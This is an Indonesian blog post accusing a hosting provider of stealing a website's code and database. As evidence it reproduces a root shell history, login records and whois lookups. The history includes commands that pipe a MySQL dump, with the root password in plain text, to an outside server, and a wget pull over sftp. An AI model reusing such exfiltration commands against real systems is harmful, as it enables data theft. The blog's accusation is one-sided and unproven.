Pencurian Script www.findtoyou.com oleh penyedia hosting www.stopanos.net

Pencurian Script http://www.findtoyou.com oleh penyedia hosting http://www.stopanos.net
By k1n9k0ng
Published: April 29, 2010
Updated: April 29, 2010

Sebelumnya kami menyewa disalah satu server sebagai VPS , kami menyewa disalah satu penyedia hosting http://www.stopanos.net , tapi mungkin dimanfaatkan oleh segelintir staff ataupun admin yang tidak bertanggung jawab mencuri source code dan database , untuk semua agar berhati-hati untuk tidak seperti ini , dan kami meminta pihak http://www.stopanos.net sebagai pihak yang bertanggung jawab atas duplikasi script http://www.findtoyou.com kami.

Berikut hasil link script kami yang diambil , dan kami punya bukti lebih kuat dari semua ini

POC :

779 free
780 free
781 top
782 free
783 top
784 free
785 top
786 ps ax
787 killall nginx
788 /usr/local/nginx/sbin/nginx
789 free
790 ps ax
791 shutdown -r now
792 /usr/local/nginx/sbin/nginx
793 ps ax
794 free
795 top
796 DF -H
797 df -h
798 cd /home
799 ls
800 mv findtoyounginx.tar findtoyou.com/findtoyounginx.tar
801 cd findtoyou.com
802 ls
803 cd..
804 cd ..
805 cat wget-log
806 ls
807 tar -cf findtoyou.tar findtoyou.com
808 cd /home
809 tar -cf findtoyounginx.tar findtoyounginx.com
810 cd /home
811 ls
812 cd findtoyou.com
813 ls
814 cd ebook
815 ls
816 cd ..
817 ls
818 cd update-database
819 ls
820 pwd
821 cd ..
822 cd ..
823 cd iqbal
824 ls
825 cd findtoyou.com
826 ls
827 cd ..
828 cd findtoyou.com
829 ls
830 cd ..
831 cd admin
832 ls
833 cd ..
834 ls
835 cd update-database123
836 ls
837 cd /home
838 cd findtoyou.com
839 ls
840 mysqldump –opt -u root -p findtoyou> findtoyou.back.dump
841 ls
842 cd ..
843 ls
844 mw findtoyou.tar findtoyou.com/findtoyou.tar
845 move findtoyou.tar findtoyou.com/findtoyou.tar
846 cp findtoyou.tar findtoyou.com/findtoyou.tar
847 ls
848 cd findtoyou.com
849 ls
850 cd ..
851 rm -rf findtoyou.tar
852 ls
853 cd backup
854 ls
855 cd database-15-04-2010
856 ls
857 rm -rf findtoyou.back.dump
858 cd /home
859 ls
860 cd findtoyou.com
861 ls
862 rm -rf findtoyou.tar
863 rm -rf findtoyounginx.tar
864 ls
865 ls
866 cd /home
867 cd backup
868 ls
869 cd database-15-04-2010
870 ls
871 get findtoyou.sql
872 wget findtoyou.sql
873 ls
874 rm -rf index.html
875 get 64.120.143.204 findtoyou.sql
876 pwd
877 wget sftp://root@64.120.143.204:12203/home/backup/database-15-04-2010/findtoyou.sql
878 bye
879 \exit
880 cd /home
881 ls
882 cd findtoyou.com
883 ls
884 ssh server “gzip -c findtoyou.sql” |gunzip > findtoyou.sql
885 exit
886 cd /etc/
887 ls
888 cd ssh
889 ls
890 vi sshd_config
891 service sshd restart
892 w
893 cd /home
894 ls
895 cd backup
896 ls
897 cd database-15-04-2010
898 ls
899 cp findtoyou.sql /home/findtoyou.com/findtoyou.sql
900 cd /home/findtoyou.com/
901 ls
902 cd ..
903 cd www
904 ls
905 cd ..
906 ls
907 cd findtoyou.com
908 chmod 777 findtoyou.sql
909 ls
910 zip -r findtoyou.sql findtoyou.zip
911 cd ..
912 ls
913 zip findtoyou.zip findtoyou.com
914 zip -r findtoyou.zip findtoyou.com
915 pwd
916 cd findtoyou.com
917 ls
918 cd
919 pwd
920 cd /home
921 cd findtoyou.com
922 ls
923 chmod 777 findtoyou.back.dump
924 cd ..
925 tar -zcvf findtoyou.tar.gz findtoyou.com
926 cd /home
927 ls
928 ls
929 cd /home
930 ls
931 mysqldump -u root -malingscript findtoyou > findtoyou1.sql
932 mysqldump -u root -pmalingscript findtoyou > findtoyou1.sql
933 cd /home
934 ls
935 chmod 777 findtoyou1.sql
936 w
937 ls
938 ls
939 mysqldump .user root .password=malingscript .opt findtoyou | mysql .host=96.9.173.46 -C pdfsearc_database
940 mysqldump -u root -pmalingscript .opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
941 mysqldump -u root -pmalingscript -opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
942 mysqldump -u root -pmalingscript findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
943 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database
944 cd /home
945 ls
946 cd findtoyou.com
947 ls
948 cd computer-software
949 ls
950 cd tmp
951 ls
952 cd ..
953 ls
954 tar czvf tmp-software.tar.gz tmp
955 ls
956 pwd
957 cd ..
958 ls
959 cd cache
960 ls
961 cd ..
962 cd document
963 ls
964 cd /tmp
965 tar czvf tmp-document.tar.gz tmp
966 cd ..
967 pwd
968 cd /home
969 cd /home/findtoyou.com/
970 cd document
971 tar czvf tmp-document.tar.gz tmp
972 ls
973 rm -rf tmp-document.tar.gz
974 cd ..
975 ls
976 cd computer-software
977 ls
978 rm -rf tmp-software.tar.gz
979 ls
980 cd ebook
981 cd ..
982 cd ebook
983 ls
984 cd ..
985 cd update-database
986 ls
987 cd /home
988 ls
989 cd findtoyou.com
990 ls
991 cd ebook
992 ls
993 cd ..
994 cd ..
995 ls
996 rm -rf findtoyou.tar.gz
997 tar czvf findtoyou.tar.gz findtoyou.com
998 ls
999 pwd
1000 free
1001 history
1002 history
1003 adduser kingkong
1004 useradd kingkong
1005 /usr/sbin/useradd
1006 /usr/sbin/useradd kingkong
1007 passwd kingkong
1008 vi /etc/sudoers
1009 yum install iptables
1010 ls -la
1011 /etc/init.d/iptables save
1012 vi /etc/sysconfig/iptables
1013 history
1014 whois 96.9.173.46
1015 ifocnfig
1016 /sbin/ifconfig
1017 cd /home
1018 ls
1019 cat wget-log –
1020 cat wget-log
1021 whois 96.9.173.46
1022 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database
1023 mysql -h96.9.173.46
1024 mysql -h96.9.173.46
1025 nmap 96.9.173.46
1026 ping 96.9.173.46
1027 nmap 96.9.173.46 -p 3306
1028 mysql -h 96.9.173.46 -p
1029 mysql -h 96.9.173.46 -p
1030 history
1031 cd findtoyounginx.com/
1032 ls
1033 cd ..
1034 cat wget-log
1035 cd /home/backup
1036 ls
1037 ls -la
1038 iconfig
1039 /sbin/ifconfig
1040 last
1041 whois 202.70.59.200
1042 whois 202.70.59.200
1043 passwd iqbal
1044 ls
1045 lastlog
1046 history
1047 history
]0;root@server:/home/backup[root@server backup]#

Lihat line ini

939 mysqldump .user root .password=malingscript .opt findtoyou | mysql .host=96.9.173.46 -C pdfsearc_database
940 mysqldump -u root -pmalingscript .opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
941 mysqldump -u root -pmalingscript -opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
942 mysqldump -u root -pmalingscript findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
943 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database

melakukan extract database ke Dedicated server yang dimiliki stophanos.net

[root@server ~]# last
iqbal pts/1 118.97.67.155 Wed Apr 21 10:08 still logged in
kingkong pts/3 114.121.164.232 Wed Apr 21 09:47 – 09:51 (00:04)
kingkong pts/3 114.121.164.232 Wed Apr 21 09:09 – 09:12 (00:02)
iqbal pts/0 118.97.67.155 Wed Apr 21 09:03 still logged in
root pts/2 118.97.67.155 Wed Apr 21 08:48 – 10:10 (01:21)
iqbal pts/1 118.97.67.155 Wed Apr 21 08:38 – 09:58 (01:19)
root pts/1 114.123.113.28 Wed Apr 21 07:46 – 07:48 (00:02)
iqbal pts/0 118.97.67.155 Wed Apr 21 07:41 – 08:58 (01:17)
iqbal pts/0 fm-ip-118.136.32 Wed Apr 21 03:53 – 05:03 (01:09)
root pts/4 202.70.59.200 Tue Apr 20 23:11 – 02:41 (03:29)
root pts/2 202.70.59.200 Tue Apr 20 22:36 – 00:47 (02:11)
root pts/1 202.70.59.200 Tue Apr 20 22:04 – 00:40 (02:36)
root pts/3 202.70.59.200 Tue Apr 20 21:33 – 23:45 (02:11)
root pts/0 202.70.59.200 Tue Apr 20 21:12 – 23:31 (02:18)
root pts/2 202.70.59.200 Tue Apr 20 20:13 – 22:29 (02:16)
root pts/1 202.70.59.200 Tue Apr 20 19:41 – 21:57 (02:15)
root pts/0 202.70.59.200 Tue Apr 20 18:58 – 21:09 (02:11)
root pts/1 173.212.255.70 Tue Apr 20 16:36 – 16:38 (00:01)
root pts/1 173.212.255.70 Tue Apr 20 16:08 – 16:18 (00:10)
root pts/0 114.125.141.211 Tue Apr 20 16:06 – 17:41 (01:35)
iqbal pts/1 118.97.67.155 Tue Apr 20 10:03 – 10:50 (00:47)
iqbal pts/0 118.97.67.155 Tue Apr 20 09:07 – 10:20 (01:12)
iqbal pts/0 118.97.67.155 Tue Apr 20 06:40 – 07:59 (01:19)
root pts/10 202.70.59.200 Tue Apr 20 04:18 – 06:31 (02:12)
iqbal pts/9 fm-ip-118.136.97 Tue Apr 20 04:15 – 04:48 (00:33)
iqbal pts/8 fm-ip-118.136.97 Tue Apr 20 04:12 – 04:48 (00:35)
root pts/7 202.70.59.200 Tue Apr 20 04:11 – 06:22 (02:11)
root pts/6 202.70.59.200 Tue Apr 20 03:42 – 06:11 (02:29)
iqbal pts/5 fm-ip-118.136.97 Tue Apr 20 03:40 – 04:48 (01:08)
root pts/4 202.70.59.200 Tue Apr 20 03:36 – 05:47 (02:11)
root pts/3 202.70.59.200 Tue Apr 20 03:25 – 04:56 (01:31)
root pts/2 202.70.59.200 Tue Apr 20 03:15 – 05:01 (01:46)
root pts/1 202.70.59.200 Tue Apr 20 02:42 – 05:16 (02:34)
iqbal pts/0 118.97.67.155 Mon Apr 19 07:31 – 08:51 (01:19)

wtmp begins Mon Apr 19 04:01:56 2010

line 800 – selesai terdapat log backup database

dan last ip nya yang melakukan lihat dengan seksama

root pts/1 173.212.255.70 Tue Apr 20 16:36 – 16:38 (00:01)
root pts/1 173.212.255.70 Tue Apr 20 16:08 – 16:18 (00:10)

[root@server ~]# whois 173.212.255.70
[Querying whois.arin.net]
[Redirected to rwhois.hostnoc.net:4321]
[Querying rwhois.hostnoc.net]

[rwhois.hostnoc.net]
%rwhois V-1.5:003fff:00 rwhois.hostnoc.net (by Network Solutions, Inc. V-1.5.9.6)
network:Class-Name:network
network:ID:net-173.212.255.70/31
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.255.70/31
network:IP-Network:173.212.255.70/31
network:Organization;I:org-255-1182870-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18510-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-173.212.192.0/18
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.192.0/18
network:IP-Network:173.212.192.0/18
network:Organization;I:org-0
network:Org-Name:Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18501-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

%ok

ok sudah jelas siapa pelakunya , musuh dalam selimut

kami buktikan lagi

http://www.extremedigger.com/
http://www.extremedigger.com/video/download-youtube.php?url=WFSBin9t_uA&name=Hatu%20Jamu%20Gendong%20Official%20Movie%20Trailercyberlog:%20anjing%20loe%20yg%20colong%20s…cript%20ditegur%20halus%20,%20bener2%20harus%20lewt%20jalur%20hukum
domainnya punya :
http://whois.domaintools.com/173.212.255.70
OrgName: Network Operations Center Inc.
OrgID: NOC
Address: PO Box 591
City: Scranton
StateProv: PA
PostalCode: 18501-0591
Country: US

ReferralServer: rwhois://rwhois.hostnoc.net:4321/

NetRange: 173.212.192.0 – 173.212.255.255
CIDR: 173.212.192.0/18
OriginAS: AS21788
NetName: HOSTNOC-7BLK
NetHandle: NET-173-212-192-0-1
Parent: NET-173-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.HOSTNOC.NET
NameServer: NS2.HOSTNOC.NET
Comment:
RegDate: 2009-10-26
Updated: 2009-10-26

RAbuseHandle: SMA4-ARIN
RAbuseName: Arcus, S. Matthew
RAbusePhone: +1-570-343-8551
RAbuseEmail:

RNOCHandle: SMA4-ARIN
RNOCName: Arcus, S. Matthew
RNOCPhone: +1-570-343-8551
RNOCEmail:

RTechHandle: SMA4-ARIN
RTechName: Arcus, S. Matthew
RTechPhone: +1-570-343-8551
RTechEmail:

OrgTechHandle: SMA4-ARIN
OrgTechName: Arcus, S. Matthew
OrgTechPhone: +1-570-343-8551
OrgTechEmail:

== Additional Information From rwhois://rwhois.hostnoc.net:4321/ ==

network:Class-Name:network
network:ID:net-173.212.255.70/31
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.255.70/31
network:IP-Network:173.212.255.70/31
network:Organization;Irg-255-1182870-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-AddressO Box 591
network:City:Scranton
network:State-ProvA
networkostal-Code:18510-0591
network:Country-Code:US
networkhone:+1-570-343-8551
network:Abuse-Email:
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-173.212.192.0/18
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.192.0/18
network:IP-Network:173.212.192.0/18
network:Organization;Irg-0
network:Org-Name:Network Operations Center, Inc.
network:Street-AddressO Box 591
network:City:Scranton
network:State-ProvA
networkostal-Code:18501-0591
network:Country-Code:US
networkhone:+1-570-343-8551
network:Abuse-Email:
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:
network:Tech-Phone:+1-570-343-855

line 939

streamingr ~ # whois 96.9.173.46
[Querying whois.arin.net]

[Redirected to rwhois.hostnoc.net:4321]
[Querying rwhois.hostnoc.net]

[rwhois.hostnoc.net]
%rwhois V-1.5:003fff:00 rwhois.hostnoc.net (by Network Solutions, Inc. V-1.5.9.6)
network:Class-Name:network
network:ID:net-96.9.173.46/31
network:Auth-Area:96.9.128.0/18
network:Network-Name:NET-96.9.173.46/31
network:IP-Network:96.9.173.46/31
network:Organization;I:org-173-1182846-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18510-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-96.9.128.0/18
network:Auth-Area:96.9.128.0/18
network:Network-Name:NET-96.9.128.0/18
network:IP-Network:96.9.128.0/18
network:Organization;I:org-0
network:Org-Name:Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18501-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

%ok

lihat disini lagi




hacker kok ngedump ke server yang hosting sama ??

kenapa gak di download aja ke luar , ngaku kena hack ya ??? , lagu lama of the ripper … hacker gak bodoh kok !!!

Kecurigaan ini berawal kami disuruh pindahkan server dengan alasan yang tidak masuk akal dan sebelum ini sudah kami peringatkan situs http://www.pdfsearchfiles.com/ ( penyedia yang sama ) juga merunning script kami , kita punya tujuan untuk memperkaya content dalam negeri dan sebagai hasil karya anak bangsa untuk memudahkan pencarian kepada penggunanya.

Advertisements
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: